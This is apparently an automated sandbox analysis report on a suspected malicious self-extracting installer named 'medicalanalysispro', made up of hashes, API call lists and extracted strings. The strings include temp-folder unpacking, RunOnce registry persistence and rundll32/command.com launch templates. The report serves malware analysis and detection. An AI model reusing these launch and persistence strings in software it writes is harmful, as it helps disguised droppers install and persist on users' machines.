                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5413870B00315CFCF24DB6C98146AABBE6AF85218F0884BED545CB251DA31CC85C7E3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-978391646
                                                                                                                                                                                                                                                                                                                • Opcode ID: a6df2552e634660056247bc64446c76708c0b5d9c0621c483aca52810fc087cb
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9231c356d24f06ab27fb3af9090f688deeedc5197afb65aa9d408661a5f3546b
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6df2552e634660056247bc64446c76708c0b5d9c0621c483aca52810fc087cb
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B01F2717093854FCB3A827C6C206667FB66BC2924B2A45AFC181CF297DD248C05C3E3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: $]q$$]q$J[j$J[j
                                                                                                                                                                                                                                                                                                                • API String ID: 0-817149878
                                                                                                                                                                                                                                                                                                                • Opcode ID: d31db3c8704f699c3683a150498f603aed2e5c3e98afcca33c140ed6c154e01b
                                                                                                                                                                                                                                                                                                                • Instruction ID: 68df9278dde3f337519120efa0337774cd8e473a142f763401dddfc72d4d24ba
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d31db3c8704f699c3683a150498f603aed2e5c3e98afcca33c140ed6c154e01b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF01F7B16543554FC73A832C18206926BBA7F86524B1585AFC4508B296CA34988583A7

                                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                                Execution Coverage:26.3%
                                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                Signature Coverage:12.3%
                                                                                                                                                                                                                                                                                                                Total number of Nodes:925
                                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:46
7ff7600a7d0a IsDBCSLeadByte 2933->2934 2935 7ff7600a7d47 2933->2935 2936 7ff7600a7d30 CharNextA 2933->2936 2934->2933 2934->2935 2935->2912 2936->2933 2938 7ff7600a7c58 2937->2938 2938->2938 2939 7ff7600a7c61 CharPrevA 2938->2939 2940 7ff7600a7c7d CharPrevA 2939->2940 2941 7ff7600a7c94 2940->2941 2942 7ff7600a7c75 2940->2942 2943 7ff7600a7cc7 2941->2943 2944 7ff7600a7cb5 CharNextA 2941->2944 2945 7ff7600a7c9e CharPrevA 2941->2945 2942->2940 2942->2941 2943->2931 2944->2943 2945->2943 2945->2944 2946->2889 2947->2702 2949 7ff7600a2281 2948->2949 2950 7ff7600a22eb 2948->2950 2951 7ff7600a7ba8 CharPrevA 2949->2951 2952 7ff7600a8470 7 API calls 2950->2952 2953 7ff7600a2294 WritePrivateProfileStringA _lopen 2951->2953 2954 7ff7600a22fd 2952->2954 2953->2950 2955 7ff7600a22c7 _llseek _lclose 2953->2955 2954->2358 2955->2950 3103 7ff7600a8417 3104 7ff7600a842f 3103->3104 3105 7ff7600a8426 _exit 3103->3105 3106 7ff7600a8444 3104->3106 3107 7ff7600a8438 _cexit 3104->3107 3105->3104 3107->3106

Callgraph

[Call graph figure omitted; legend: Executed, Not Executed, Opacity -> Relevance, Disassembly available]

Control-flow Graph

[Control-flow graph figure omitted; legend: Executed, Not Executed]

Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
• String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$ham$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
• API String ID: 2679723528-2123044605
• Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
• Instruction ID: 5174b131c2288469e02a41cc2a6fd843a3e8e8e3fd0f8c91aa4ed2df668c2073
• Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
• Instruction Fuzzy Hash: BF028075A08642D6E760AB20E8406BAB7A0FB85744FD44135DA4E43F9ADF3CF564C730

Control-flow Graph

Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d
• API String ID: 178549006-468490929
• Opcode ID: 975c7f65adf0376f38f92b3e0fb3544ecbadfca005f218675da6c195c9c5ec1f
• Instruction ID: f72c200850730a49682f11a9109436b32c1eea18cc65fb189f0f60ebdb153fbb
• Opcode Fuzzy Hash: 975c7f65adf0376f38f92b3e0fb3544ecbadfca005f218675da6c195c9c5ec1f
• Instruction Fuzzy Hash: 66816F32B08A86D6EB10AF11E8406B9F7A0FB89B54F855131DA4E07B5ADF3DE525C720

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
• Not Executed
(Control-flow graph starting at 7ff7600a1684; node and edge dump not reproduced.)
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
• String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
• API String ID: 383838535-1383298736
• Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
• Instruction ID: bd5b5783ebc7f99a7ee5c283494f0448f8f8f4db0d265b67a319d06acf6fad27
• Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
• Instruction Fuzzy Hash: 81E18B62B19682D6EB11AF20A4402FAB7A0EB45784FD44136DA4D07F9ADF3DF569C330

Control-flow Graph (starts at 7ff7600a66c4; legend: Executed / Not Executed; node and edge dump not reproduced)
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
• String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
• API String ID: 3973824516-559629209
• Opcode ID: dfd9198a31c2bb830314bac0c16e355497c0ad7db76eb342e63e20a133dffc7a
• Instruction ID: e41b3324d1c0783cf9b0a48e7eec6435f5d8954b6d6443c88f82bb32bb76b11b
• Opcode Fuzzy Hash: dfd9198a31c2bb830314bac0c16e355497c0ad7db76eb342e63e20a133dffc7a
• Instruction Fuzzy Hash: 20D18022A18682C6EB10AB2494502BAF7B1FB95744FD44135DA4E47F9ADF3DF825CB30

Control-flow Graph (starts at 7ff7600a2db4; legend: Executed / Not Executed; node and edge dump not reproduced)
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
• String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$ham
• API String ID: 3100096412-71271436
• Opcode ID: 7fc7f578be530f482524e13d1538833715e790512501b6b919f004c900bcfea5
• Instruction ID: 1532ac87bb8192897821c307cb4a22cbe5c8daa00dad0a86dcb8e4bbb22e7f50
• Opcode Fuzzy Hash: 7fc7f578be530f482524e13d1538833715e790512501b6b919f004c900bcfea5
• Instruction Fuzzy Hash: F9815A61A08642C6F720BB25A810BB9F6A0EF99784FC44135D94E46F9BDF7CB465CB30

Control-flow Graph (starts at 7ff7600a6ca4; legend: Executed / Not Executed; node and edge dump not reproduced)
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                                                                                • API String ID: 4237285672-1193786559
                                                                                                                                                                                                                                                                                                                • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 603775c11ab0fa6a923bc815490c50118c72e5e00e5e891e339dab48a4e7d787
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43A16036A18641CAE720AF24E4406BAFBA1FB89744F844135DA4E43F59DF3DE465CB20

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
• String ID: *MEMCAB$CABINET
• API String ID: 1305606123-2642027498
• Opcode ID: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
• Instruction ID: 18a6768ad857a067399041e24d0c9059460ff4dc13d52ec46ee3fb361fdccb95
• Opcode Fuzzy Hash: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
• Instruction Fuzzy Hash: DF51F735A08B42C6EB10AB60E8547B9FAA0FB89746FC58135D94E06B5ADF3DF125C730

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
• API String ID: 3010855178-3123416969
• Opcode ID: cf47587dfbe55bd8e5be1b8ceb9bd214e6a725bb0b495cd8f058f5f742f6bee5
• Instruction ID: 76e44261e745a8f4bea03d49893f412cd9813304798f93b7e7b3ea75daa6d4be
• Opcode Fuzzy Hash: cf47587dfbe55bd8e5be1b8ceb9bd214e6a725bb0b495cd8f058f5f742f6bee5
• Instruction Fuzzy Hash: 77711631E0C642C6FA60BB21A8407B5E6A4AF98740FC58136E94E46F9FDF6CF5648730

Control-flow Graph

• Executed
• Not Executed
APIs
• GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7600A2CE1), ref: 00007FF7600A657C
• CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7600A2CE1), ref: 00007FF7600A662F
• RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7600A2CE1), ref: 00007FF7600A666F
  • Part of subcall function 00007FF7600A63B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF7600A2CE1), ref: 00007FF7600A6423
  • Part of subcall function 00007FF7600A63B8: GetFileAttributesA.KERNELBASE ref: 00007FF7600A6432
  • Part of subcall function 00007FF7600A63B8: GetTempFileNameA.KERNEL32 ref: 00007FF7600A645B
  • Part of subcall function 00007FF7600A63B8: DeleteFileA.KERNEL32 ref: 00007FF7600A6473
  • Part of subcall function 00007FF7600A63B8: CreateDirectoryA.KERNEL32 ref: 00007FF7600A6484
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                                                                                • API String ID: 1979080616-3703068183

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: Handle$AddressCloseExitModuleProcVersionWindows
• String ID: @$HeapSetInformation$Kernel32.dll
• API String ID: 1302179841-1204263913
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
• String ID:
• API String ID: 836429354-0

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce
• API String ID: 3049360512-2857993011

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
• String ID:
• API String ID: 3183975587-3916222277

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                                                                                • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                                                                                • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                                                                                                                                                                                                                                                                • Instruction ID: 29fd9c7984cc2485872b1a213f56e807d013f8637f9f474aa2dc48c54c6c0641
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E317032B08B42CBD720AF65E8406A9F7A4FB89754F844535EA8D43F59DF38E564CB20

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                                                                                • String ID: IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                                                                                • API String ID: 1082909758-3932986939
                                                                                                                                                                                                                                                                                                                • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                                                                                                                                                                                                                                                • Instruction ID: ceb56696e7d264298211defc6a4981f5cc94eb4a308ba95f40361f2a8f0743ac
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60212C71B08941C6E610AB56A9503F9EBA1EB8EB81F858130DD4E46B9ACF3DE455C620

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2995914023-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                                                                                                                                                                                                                                                • Instruction ID: b74df9183f509e814469fdf70e68a63faa7367f47c1b3f04b30c9a9c574e0c5e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40515932A08A82C6EB60AB21E840779A6A0FF44754FD40431DA4D86B9ADF7DF961C730
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A5078
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A5089
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50AF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: LoadResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50C0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: LockResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50CF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: memcpy_s.MSVCRT ref: 00007FF7600A50EE
